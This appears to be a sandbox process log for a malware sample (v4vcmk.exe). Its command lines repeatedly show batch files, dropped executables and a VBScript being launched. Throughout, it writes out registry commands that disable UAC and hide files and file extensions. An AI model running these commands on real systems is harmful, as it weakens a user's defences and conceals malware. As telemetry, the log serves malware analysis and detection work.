C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\zmMgUMgg.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\XkocwsII.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tWQsoMgE.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\eaEccwMQ.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\mmMwAgYM.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\iGMkMkcA.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\yAksgYEk.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Users\Admin\IGMkwoUM\ecEsQUkU.exe

"C:\Users\Admin\IGMkwoUM\ecEsQUkU.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\ProgramData\QAMQQckI\QMYUIoMs.exe

"C:\ProgramData\QAMQQckI\QMYUIoMs.exe"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\VwUgIAEY.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\xWYgMAME.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 440 -p 3520 -ip 3520

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 4836 -ip 4836

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\HiwwEwMo.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\uiwUowMU.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3520 -s 224

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4836 -s 228

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\UkkkgQMs.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\YWAYQYQM.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\AEMEAUsc.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\kiQkkkcM.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\pGYgkQYQ.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\ZoQQIkks.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tyQogsII.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\backgroundTaskHost.exe

"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\SUwIEcww.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\oawwwIoQ.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\eCMYcogU.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\gksEAEsI.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\csEcsUAM.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\aOsUAUgg.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

